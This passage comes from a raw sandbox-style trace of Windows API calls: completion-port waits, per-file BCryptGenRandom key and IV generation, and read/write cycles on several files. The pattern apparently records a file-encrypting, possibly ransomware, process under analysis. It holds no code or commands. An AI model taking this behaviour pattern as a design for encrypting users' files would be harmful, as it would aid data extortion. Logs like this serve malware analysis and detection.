lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0113.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0113.958] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.958] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.958] free (_Block=0x77d7a8) [0113.958] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.958] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.959] free (_Block=0x2071c20) [0113.959] free (_Block=0x2071d30) [0113.959] free (_Block=0x77d8b0) [0113.959] WriteFile (in: hFile=0x340, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0113.959] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.963] CloseHandle (hObject=0x81c) returned 1 [0113.965] free (_Block=0x3d70450) [0113.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0113.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0113.975] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.975] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.975] free (_Block=0x77d7a8) [0113.975] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.975] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.975] free (_Block=0x2071c20) [0113.975] free (_Block=0x2071d30) [0113.975] free (_Block=0x77d8b0) [0113.975] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0113.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.991] CloseHandle (hObject=0x340) returned 1 [0113.992] free (_Block=0x3db04c0) [0113.992] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.004] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0114.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0114.005] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.005] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.006] free (_Block=0x77d7a8) [0114.006] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.006] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.006] free (_Block=0x2071c20) [0114.006] free (_Block=0x2071d30) [0114.006] free (_Block=0x77d8b0) [0114.006] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.006] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.012] CloseHandle (hObject=0x13c0) returned 1 [0114.013] free (_Block=0x3e70008) [0114.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.017] ReadFile (in: hFile=0x340, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0xfea, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.076] CloseHandle (hObject=0x340) returned 1 [0114.076] free (_Block=0x1ff1e60) [0114.076] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.078] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x20f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0114.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.088] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x2a40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0114.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0114.102] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.102] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.102] free (_Block=0x77d7a8) [0114.102] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.102] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.103] free (_Block=0x2071c20) [0114.103] free (_Block=0x2071d30) [0114.103] free (_Block=0x77d8b0) [0114.103] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0114.119] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.119] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0114.120] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.120] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.120] free (_Block=0x77d7a8) [0114.120] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.120] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.121] free (_Block=0x2071c20) [0114.121] free (_Block=0x2071d30) [0114.121] free (_Block=0x77d8b0) [0114.121] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0114.121] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.134] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1ed0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0114.134] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.147] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x400c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0114.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.182] CloseHandle (hObject=0x2f4) returned 1 [0114.184] free (_Block=0x3ef0008) [0114.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.197] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x83c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0114.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.547] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x2340, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.547] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.564] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x3690, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0114.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.580] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x3b3c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0114.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.589] CloseHandle (hObject=0x81c) returned 1 [0114.592] free (_Block=0x3e70008) [0114.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0114.592] CloseHandle (hObject=0x340) returned 1 [0114.596] free (_Block=0x3ef0008) [0114.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.694] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x96c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0115.694] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.701] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1378, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0115.710] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.724] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xf7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0115.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.746] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0115.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.761] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0115.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.761] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0115.762] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.762] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.762] free (_Block=0x77d7a8) [0115.762] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.762] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.762] free (_Block=0x2071c20) [0115.763] free (_Block=0x2071d30) [0115.763] free (_Block=0x77d8b0) [0115.763] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0115.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.770] CloseHandle (hObject=0x13c0) returned 1 [0115.772] free (_Block=0x3d70450) [0115.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.778] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x76ce, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0115.789] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.795] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4604, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0115.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0115.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0115.822] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.822] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.822] free (_Block=0x77d7a8) [0115.822] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.822] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.823] free (_Block=0x2071c20) [0115.823] free (_Block=0x2071d30) [0115.823] free (_Block=0x77d8b0) [0115.823] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0115.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.834] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x79d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0115.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.839] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x9b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0115.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.839] CloseHandle (hObject=0x340) returned 1 [0115.840] free (_Block=0x3e70008) [0115.841] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.863] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x88c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0115.863] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0115.864] CloseHandle (hObject=0x13c0) returned 1 [0115.868] free (_Block=0x3d70450) [0115.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0116.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0116.224] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0116.224] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0116.225] free (_Block=0x77d7a8) [0116.225] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0116.225] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0116.225] free (_Block=0x2071c20) [0116.225] free (_Block=0x2071d30) [0116.225] free (_Block=0x77d8b0) [0116.225] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 